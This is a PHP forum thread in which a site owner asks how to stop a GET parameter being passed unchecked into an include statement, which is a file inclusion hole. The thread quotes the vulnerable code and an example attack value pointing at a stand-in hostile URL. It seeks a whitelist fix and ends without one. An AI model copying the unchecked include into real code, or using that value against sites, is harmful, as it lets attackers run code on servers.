Need your HELP on unchecked variable

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Post Reply
ee01es
Forum Newbie
Posts: 4
Joined: Sun Jun 25, 2006 6:18 pm
Location: Bonn, Germany

Need your HELP on unchecked variable

Post by ee01es »

feyd | Please use

Code: Select all

,

Code: Select all

and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read:  [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]


Hello,

Please help me!

Code: Select all

<?php
if (count($HTTP_GET_VARS) == 0) {
        $content = 'welcome.php';
        $pageTitle = 'Welcome';
} else {
        $content = $HTTP_GET_VARS['content'] . ".php";      THIS IS LINE 8
        $pageTitle = $HTTP_GET_VARS['pagetitle'];
}
include "library/structure.php";
?>
The problem is that, current line 8 is to be replaced by some code that only allows $content to be set to one of a known list of pages. I have tried with elseif but no luck.

Code: Select all

<?php
if (count($HTTP_GET_VARS) == 0) {
        //print "<meta http-equiv='refresh' content='0; URL=index.php?content=welcome&pagetitle=Welcome'>";
        $content = 'welcome.php';
        $pageTitle = 'Welcome'; }

elseif (count($HTTP_GET_VARS) == 1) {

        $content = 'committee.php';
        $pageTitle = 'Committee Members'; }

elseif (count($HTTP_GET_VARS) == 2) {
        $content = 'events.php';
        $pageTitle = 'Meetings and Events'; }

elseif (count($HTTP_GET_VARS) == 3) {
        $content = 'farewell.php';
        $pageTitle = '2004 Farewell Message'; }

elseif (count($HTTP_GET_VARS) == 4) {
        $content = 'pastevents.php';
        $pageTitle = 'Past Events'; }

else  {
        $content = 'links.php';
        $pageTitle = 'Links'; }

include "library/structure.php";
?>
Many thanks.


feyd | Please use

Code: Select all

,

Code: Select all

and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read:  [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.[/color]
User avatar
tecktalkcm0391
DevNet Resident
Posts: 1030
Joined: Fri May 26, 2006 9:25 am
Location: Florida

Post by tecktalkcm0391 »

1.) Use the PHP button or tags for php ( [PHP*] without the *)
2.) Tell us what you need help with in depth
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

You may want to look using a switch().
ee01es
Forum Newbie
Posts: 4
Joined: Sun Jun 25, 2006 6:18 pm
Location: Bonn, Germany

Need your HELP on unchecked variable

Post by ee01es »

Hi Feyd,

Thank you for your advice and the hint on using "switch", but it does not seem to be working correct for me :!:

BR, Eha
User avatar
Luke
The Ninja Space Mod
Posts: 6424
Joined: Fri Aug 05, 2005 1:53 pm
Location: Paradise, CA

Post by Luke »

post your code of it "not working correct" so we can see what's wrong
ee01es
Forum Newbie
Posts: 4
Joined: Sun Jun 25, 2006 6:18 pm
Location: Bonn, Germany

Post by ee01es »

Thank you very much for your quick reply.

Code: Select all

<?php
$fp = fopen ("menu.csv","r");
while ($data = fgetcsv ($fp, 1000, ",")) {
        if ($HTTP_GET_VARS['content'] == $data[1]) {
                print "<span class=menucurrent>" . $data[0] . "</span><br>\n";
        } else {
                print "<a class=menu href=\"index.php?content=" . $data[1] . "&pagetitle=" . $data[0] . "\">" . $data[0] . "</a><br>\n";
        }
}
fclose ($fp);
?>


<a class=menu href="http://www.iee.org.uk" target="_blank">IEE </a><br>

</font>
</td>

<td class=bodytext valign=top>
<!--Contents of the page inserted below here from file given in the php variable $content-->



<center>
<h1><?php print $siteTitle ?></h1>
<h2><?php print $pageTitle ?></h2>
</center>



<?php include $content; ?>     THIS IS NOT CHECKED***
<p class=note>


<?php $update_date = date ("jS F Y", filemtime($content)); ?>
Last Updated: <?php print $update_date; ?>  Webdevelopment: <a href="mailto:<?php print $webdev_email; ?>"><?php print $webdev_name; ?></a>


***The script above accepts a variable 'content' which is not checked before being passed into a PHP 'include' command. As a result, an
attacker can pass content=http://www.badsite.com/evilcode.htm to your site and the server will include this code in your site.

So, I need to introduce checking into my script to ensure that it is not possible to pass unchecked variables into the script, and to ensure that these are not then used within an 'include' or 'require' statement.

The problem is that, current line 8 in the previous source is to be replaced by some code that only allows $content to be set to one of a known list of pages. I have tried with elseif but no luck. I have got the list of pages in menu.csv and therefore I could do something like loop through menu.csv until the page name equals $HTTP_GET_VARS['content'] and then set $content to be that, else set $content to the default welcome page. What do you think? Any ideas on how to do it?

Many thanks for your support.
Cheers, Eha
ee01es
Forum Newbie
Posts: 4
Joined: Sun Jun 25, 2006 6:18 pm
Location: Bonn, Germany

Need your HELP on unchecked variable

Post by ee01es »

Hi Chris, Thanks for the reply.

Please find the requested info!

Cheers, Eha
Post Reply